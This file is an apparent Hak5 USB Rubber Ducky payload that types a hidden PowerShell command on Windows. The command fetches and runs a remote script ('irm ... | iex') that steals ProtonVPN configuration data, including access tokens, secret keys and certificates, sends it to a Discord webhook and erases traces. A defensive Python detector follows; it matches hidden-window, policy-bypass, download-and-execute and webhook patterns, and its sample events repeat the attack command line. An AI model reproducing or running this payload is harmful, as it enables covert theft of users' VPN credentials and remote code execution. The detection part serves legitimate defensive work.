GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/ProtonVPN-config/payload.txt
REM ###################################################################
REM #                                                                 |
REM # Title    : ProtonVPN-config-to-Discord-Exfiltration             |
REM # Author   : Aleff                                                |
REM # Version  : 1.0                                                  |
REM # Category : Credentials, Exfiltration                            |
REM # Target   : Windows 10-11                                        |
REM #                                                                 |
REM ###################################################################

REM Title: ProtonVPN-config-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs the ProtonVPN config file, saves it as cleartext in a variable and exfiltrates the info via Discord Webhook.
REM In the config file you can find a lot of information about the user, such as:
REM - UserUid
REM - UserAccessToken
REM - UserRefreshToken
REM - UserAuthenticationPublicKey
REM - UserAuthenticationSecretKey
REM - UserAuthenticationCertificatePem
REM - UserCertificationServerPublicKey
REM - and so on...
REM Then it cleans up traces of what you have done.
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
REM Version: 1.0
REM Category: Credentials, Exfiltration
REM Requirements: ProtonVPN user logged in at least once, and an internet connection
REM

REM REQUIRED - Provide your WEBHOOK URL - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com

DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK

REM Replace example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE PAYLOAD example.com
STRING ';irm PAYLOAD | iex
ENTER
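Added example, not part of the hak5 repository: a defender-side check for the launcher line this payload types into the Run dialog (hidden PowerShell window, execution-policy bypass, `irm ... | iex`, Discord webhook URL), run over process-creation command lines. It also covers the long parameter names; the event records, host names and the two-indicator threshold are constructed assumptions.

```python
import re

# Download-and-execute cradle: irm/iwr output piped straight into iex.
CRADLE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|]*\|\s*"
    r"(?:iex|invoke-expression)\b", re.I)
# Discord webhook endpoint, the exfiltration channel named in the payload header.
WEBHOOK = re.compile(r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/", re.I)
# A "-name value" pair; the lookahead lets a value also start the next pair.
PARAM = re.compile(r"(?<!\S)-(\w+)(?=\s+(\S+))")


def indicators(cmdline):
    """Return the set of suspicious traits found in one process command line."""
    hits = set()
    for m in PARAM.finditer(cmdline):
        name, value = m.group(1).lower(), m.group(2).lower().strip("'\"")
        # powershell.exe accepts parameter prefixes, so "-w h" is "-WindowStyle Hidden".
        if value and "windowstyle".startswith(name) and "hidden".startswith(value):
            hits.add("hidden_window")
        if (name == "ep" or "executionpolicy".startswith(name)) and value == "bypass":
            hits.add("policy_bypass")
    if CRADLE.search(cmdline):
        hits.add("download_exec")
    if WEBHOOK.search(cmdline):
        hits.add("discord_webhook")
    return hits


def triage(events, threshold=2):
    """Return (host, sorted indicators) for events with >= threshold indicators."""
    scored = ((ev["host"], indicators(ev["cmd"])) for ev in events)
    return [(host, sorted(hits)) for host, hits in scored if len(hits) >= threshold]


# Constructed process-creation records (e.g. Sysmon Event ID 1 CommandLine values).
SAMPLE_EVENTS = [
    {"host": "WS-01", "cmd": "powershell -w h -ep bypass $discord='https://discordapp.com"
                             "/api/webhooks/<webhook_id>/<token>';irm example.com | iex"},
    {"host": "WS-02", "cmd": r"powershell.exe -NoProfile -ExecutionPolicy Bypass "
                             r"-File C:\Scripts\backup.ps1"},
    {"host": "WS-03", "cmd": 'powershell -Command "Get-Service | Where-Object Status -eq Running"'},
    {"host": "WS-04", "cmd": 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass '
                             '-c "Invoke-RestMethod example.com | Invoke-Expression"'},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(host, hits)
```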